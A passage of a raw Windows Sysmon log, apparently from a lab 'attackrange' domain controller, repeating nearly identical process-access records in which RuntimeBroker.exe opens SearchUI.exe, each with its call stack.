13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012226Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012225Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012224Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012223Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012222Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012221Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012220Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012219Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012218Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012217Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012216Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012215Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012214Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012213Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012212Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012211Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012210Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012209Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012208Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 